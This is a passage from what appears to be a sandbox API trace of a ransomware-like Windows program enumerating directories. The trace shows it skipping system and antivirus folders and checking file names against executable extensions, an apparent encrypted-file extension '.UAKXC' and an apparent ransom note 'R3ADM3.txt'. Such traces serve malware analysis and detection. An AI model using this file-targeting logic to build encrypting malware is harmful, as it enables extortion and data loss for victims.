lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0140.364] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0140.364] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0140.364] StrStrIW (lpFirst="Network", lpSrch="tmp") returned 0x0 [0140.364] StrStrIW (lpFirst="Network", lpSrch="winnt") returned 0x0 [0140.364] StrStrIW (lpFirst="Network", lpSrch="temp") returned 0x0 [0140.364] StrStrIW (lpFirst="Network", lpSrch="thumb") returned 0x0 [0140.364] StrStrIW (lpFirst="Network", lpSrch="$Recycle.Bin") returned 0x0 [0140.364] StrStrIW (lpFirst="Network", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.364] StrStrIW (lpFirst="Network", lpSrch="System Volume Information") returned 0x0 [0140.364] StrStrIW (lpFirst="Network", lpSrch="Boot") returned 0x0 [0140.364] StrStrIW (lpFirst="Network", lpSrch="Windows") returned 0x0 [0140.364] StrStrIW (lpFirst="Network", lpSrch="Trend Micro") returned 0x0 [0140.364] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef14e8 [0140.364] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1530 [0140.364] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.364] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1530 | out: hHeap=0xea0000) returned 1 [0140.364] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef14e8 | out: hHeap=0xea0000) returned 1 [0140.364] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed238 [0140.364] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2cb8 [0140.364] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.364] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OFFICE", cAlternateFileName="")) returned 1 [0140.364] lstrcmpW (lpString1="OFFICE", lpString2=".") returned 1 [0140.365] lstrcmpW (lpString1="OFFICE", lpString2="..") returned 1 [0140.365] StrStrIW (lpFirst="OFFICE", lpSrch="tmp") returned 0x0 [0140.365] StrStrIW (lpFirst="OFFICE", lpSrch="winnt") returned 0x0 [0140.365] StrStrIW (lpFirst="OFFICE", lpSrch="temp") returned 0x0 [0140.365] StrStrIW (lpFirst="OFFICE", lpSrch="thumb") returned 0x0 [0140.365] StrStrIW (lpFirst="OFFICE", lpSrch="$Recycle.Bin") returned 0x0 [0140.365] StrStrIW (lpFirst="OFFICE", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.365] StrStrIW (lpFirst="OFFICE", lpSrch="System Volume Information") returned 0x0 [0140.365] StrStrIW (lpFirst="OFFICE", lpSrch="Boot") returned 0x0 [0140.365] StrStrIW (lpFirst="OFFICE", lpSrch="Windows") returned 0x0 [0140.365] StrStrIW (lpFirst="OFFICE", lpSrch="Trend Micro") returned 0x0 [0140.365] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef14e8 [0140.365] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1530 [0140.365] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef14e8 | out: hHeap=0xea0000) returned 1 [0140.365] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed260 [0140.365] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef14e8 [0140.365] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1530 | out: hHeap=0xea0000) returned 1 [0140.365] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xfa44d4a0, ftLastAccessTime.dwHighDateTime=0x1d305fd, ftLastWriteTime.dwLowDateTime=0xfa44d4a0, ftLastWriteTime.dwHighDateTime=0x1d305fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0140.365] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0140.365] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0140.365] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="tmp") returned 0x0 [0140.365] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="winnt") returned 0x0 [0140.365] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="temp") returned 0x0 [0140.365] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="thumb") returned 0x0 [0140.365] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="$Recycle.Bin") returned 0x0 [0140.365] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.366] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="System Volume Information") returned 0x0 [0140.366] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="Boot") returned 0x0 [0140.366] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="Windows") returned 0x0 [0140.366] StrStrIW (lpFirst="OfficeSoftwareProtectionPlatform", lpSrch="Trend Micro") returned 0x0 [0140.366] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3340 [0140.366] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1530 [0140.366] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1578 [0140.366] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd988 [0140.366] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1578 | out: hHeap=0xea0000) returned 1 [0140.366] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1530 | out: hHeap=0xea0000) returned 1 [0140.366] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3340 | out: hHeap=0xea0000) returned 1 [0140.366] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed288 [0140.366] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedda98 [0140.366] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd988 | out: hHeap=0xea0000) returned 1 [0140.366] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58d7b430, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58d7b430, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58d7b430, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0140.366] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0140.366] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0140.366] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0140.366] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0140.366] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0140.366] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0140.366] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0140.366] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0140.366] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0140.366] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RAC", cAlternateFileName="")) returned 1 [0140.366] lstrcmpW (lpString1="RAC", lpString2=".") returned 1 [0140.366] lstrcmpW (lpString1="RAC", lpString2="..") returned 1 [0140.366] StrStrIW (lpFirst="RAC", lpSrch="tmp") returned 0x0 [0140.367] StrStrIW (lpFirst="RAC", lpSrch="winnt") returned 0x0 [0140.367] StrStrIW (lpFirst="RAC", lpSrch="temp") returned 0x0 [0140.367] StrStrIW (lpFirst="RAC", lpSrch="thumb") returned 0x0 [0140.367] StrStrIW (lpFirst="RAC", lpSrch="$Recycle.Bin") returned 0x0 [0140.367] StrStrIW (lpFirst="RAC", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.367] StrStrIW (lpFirst="RAC", lpSrch="System Volume Information") returned 0x0 [0140.367] StrStrIW (lpFirst="RAC", lpSrch="Boot") returned 0x0 [0140.367] StrStrIW (lpFirst="RAC", lpSrch="Windows") returned 0x0 [0140.367] StrStrIW (lpFirst="RAC", lpSrch="Trend Micro") returned 0x0 [0140.367] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1530 [0140.367] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1578 [0140.367] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1530 | out: hHeap=0xea0000) returned 1 [0140.367] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed2b0 [0140.367] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1530 [0140.367] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1578 | out: hHeap=0xea0000) returned 1 [0140.367] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27df8b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27df8b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0140.367] lstrcmpW (lpString1="Search", lpString2=".") returned 1 [0140.367] lstrcmpW (lpString1="Search", lpString2="..") returned 1 [0140.367] StrStrIW (lpFirst="Search", lpSrch="tmp") returned 0x0 [0140.367] StrStrIW (lpFirst="Search", lpSrch="winnt") returned 0x0 [0140.367] StrStrIW (lpFirst="Search", lpSrch="temp") returned 0x0 [0140.367] StrStrIW (lpFirst="Search", lpSrch="thumb") returned 0x0 [0140.367] StrStrIW (lpFirst="Search", lpSrch="$Recycle.Bin") returned 0x0 [0140.367] StrStrIW (lpFirst="Search", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.367] StrStrIW (lpFirst="Search", lpSrch="System Volume Information") returned 0x0 [0140.367] StrStrIW (lpFirst="Search", lpSrch="Boot") returned 0x0 [0140.367] StrStrIW (lpFirst="Search", lpSrch="Windows") returned 0x0 [0140.367] StrStrIW (lpFirst="Search", lpSrch="Trend Micro") returned 0x0 [0140.367] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1578 [0140.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef15c0 [0140.368] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1578 | out: hHeap=0xea0000) returned 1 [0140.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed2d8 [0140.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1578 [0140.368] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef15c0 | out: hHeap=0xea0000) returned 1 [0140.368] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0140.368] lstrcmpW (lpString1="User Account Pictures", lpString2=".") returned 1 [0140.368] lstrcmpW (lpString1="User Account Pictures", lpString2="..") returned 1 [0140.368] StrStrIW (lpFirst="User Account Pictures", lpSrch="tmp") returned 0x0 [0140.368] StrStrIW (lpFirst="User Account Pictures", lpSrch="winnt") returned 0x0 [0140.368] StrStrIW (lpFirst="User Account Pictures", lpSrch="temp") returned 0x0 [0140.368] StrStrIW (lpFirst="User Account Pictures", lpSrch="thumb") returned 0x0 [0140.368] StrStrIW (lpFirst="User Account Pictures", lpSrch="$Recycle.Bin") returned 0x0 [0140.368] StrStrIW (lpFirst="User Account Pictures", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.368] StrStrIW (lpFirst="User Account Pictures", lpSrch="System Volume Information") returned 0x0 [0140.368] StrStrIW (lpFirst="User Account Pictures", lpSrch="Boot") returned 0x0 [0140.368] StrStrIW (lpFirst="User Account Pictures", lpSrch="Windows") returned 0x0 [0140.368] StrStrIW (lpFirst="User Account Pictures", lpSrch="Trend Micro") returned 0x0 [0140.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef15c0 [0140.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1608 [0140.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0140.368] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1608 | out: hHeap=0xea0000) returned 1 [0140.368] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef15c0 | out: hHeap=0xea0000) returned 1 [0140.368] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.368] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed300 [0140.369] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec490 [0140.369] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.369] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0140.369] lstrcmpW (lpString1="Vault", lpString2=".") returned 1 [0140.369] lstrcmpW (lpString1="Vault", lpString2="..") returned 1 [0140.369] StrStrIW (lpFirst="Vault", lpSrch="tmp") returned 0x0 [0140.369] StrStrIW (lpFirst="Vault", lpSrch="winnt") returned 0x0 [0140.369] StrStrIW (lpFirst="Vault", lpSrch="temp") returned 0x0 [0140.369] StrStrIW (lpFirst="Vault", lpSrch="thumb") returned 0x0 [0140.369] StrStrIW (lpFirst="Vault", lpSrch="$Recycle.Bin") returned 0x0 [0140.369] StrStrIW (lpFirst="Vault", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.369] StrStrIW (lpFirst="Vault", lpSrch="System Volume Information") returned 0x0 [0140.369] StrStrIW (lpFirst="Vault", lpSrch="Boot") returned 0x0 [0140.369] StrStrIW (lpFirst="Vault", lpSrch="Windows") returned 0x0 [0140.369] StrStrIW (lpFirst="Vault", lpSrch="Trend Micro") returned 0x0 [0140.369] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef15c0 [0140.369] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1608 [0140.369] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef15c0 | out: hHeap=0xea0000) returned 1 [0140.369] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed328 [0140.369] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef15c0 [0140.369] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1608 | out: hHeap=0xea0000) returned 1 [0140.369] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VISIO", cAlternateFileName="")) returned 1 [0140.370] lstrcmpW (lpString1="VISIO", lpString2=".") returned 1 [0140.370] lstrcmpW (lpString1="VISIO", lpString2="..") returned 1 [0140.370] StrStrIW (lpFirst="VISIO", lpSrch="tmp") returned 0x0 [0140.370] StrStrIW (lpFirst="VISIO", lpSrch="winnt") returned 0x0 [0140.370] StrStrIW (lpFirst="VISIO", lpSrch="temp") returned 0x0 [0140.370] StrStrIW (lpFirst="VISIO", lpSrch="thumb") returned 0x0 [0140.370] StrStrIW (lpFirst="VISIO", lpSrch="$Recycle.Bin") returned 0x0 [0140.370] StrStrIW (lpFirst="VISIO", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.370] StrStrIW (lpFirst="VISIO", lpSrch="System Volume Information") returned 0x0 [0140.370] StrStrIW (lpFirst="VISIO", lpSrch="Boot") returned 0x0 [0140.370] StrStrIW (lpFirst="VISIO", lpSrch="Windows") returned 0x0 [0140.370] StrStrIW (lpFirst="VISIO", lpSrch="Trend Micro") returned 0x0 [0140.370] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1608 [0140.370] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.370] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1608 | out: hHeap=0xea0000) returned 1 [0140.370] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed350 [0140.370] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1608 [0140.370] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.370] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60ae73a0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x60ae73a0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0140.370] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0140.370] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0140.370] StrStrIW (lpFirst="Windows", lpSrch="tmp") returned 0x0 [0140.370] StrStrIW (lpFirst="Windows", lpSrch="winnt") returned 0x0 [0140.370] StrStrIW (lpFirst="Windows", lpSrch="temp") returned 0x0 [0140.370] StrStrIW (lpFirst="Windows", lpSrch="thumb") returned 0x0 [0140.370] StrStrIW (lpFirst="Windows", lpSrch="$Recycle.Bin") returned 0x0 [0140.370] StrStrIW (lpFirst="Windows", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.371] StrStrIW (lpFirst="Windows", lpSrch="System Volume Information") returned 0x0 [0140.371] StrStrIW (lpFirst="Windows", lpSrch="Boot") returned 0x0 [0140.371] StrStrIW (lpFirst="Windows", lpSrch="Windows") returned="Windows" [0140.371] StrStrIW (lpFirst="Windows", lpSrch=".UAKXC") returned 0x0 [0140.371] StrStrIW (lpFirst="Windows", lpSrch=".exe") returned 0x0 [0140.371] StrStrIW (lpFirst="Windows", lpSrch=".dll") returned 0x0 [0140.371] StrStrIW (lpFirst="Windows", lpSrch=".lnk") returned 0x0 [0140.371] StrStrIW (lpFirst="Windows", lpSrch=".sys") returned 0x0 [0140.371] StrStrIW (lpFirst="Windows", lpSrch=".msi") returned 0x0 [0140.371] StrStrIW (lpFirst="Windows", lpSrch="R3ADM3.txt") returned 0x0 [0140.371] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.371] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.371] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec1b8 [0140.371] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.371] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.371] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3340 [0140.371] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e20 [0140.371] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0140.371] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3340 | out: hHeap=0xea0000) returned 1 [0140.371] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.371] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0140.371] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0140.371] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch="tmp") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch="winnt") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch="temp") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch="thumb") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch="$Recycle.Bin") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch="System Volume Information") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch="Boot") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch="Windows") returned="Windows Defender" [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch=".UAKXC") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch=".exe") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch=".dll") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch=".lnk") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch=".sys") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch=".msi") returned 0x0 [0140.372] StrStrIW (lpFirst="Windows Defender", lpSrch="R3ADM3.txt") returned 0x0 [0140.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0140.372] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.372] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.372] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0140.372] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d30 [0140.373] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec560 [0140.373] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec4f8 | out: hHeap=0xea0000) returned 1 [0140.373] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0140.373] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0140.373] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0140.373] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch="tmp") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch="winnt") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch="temp") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch="thumb") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch="$Recycle.Bin") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.373] StrStrIW (lpFirst="Windows NT", 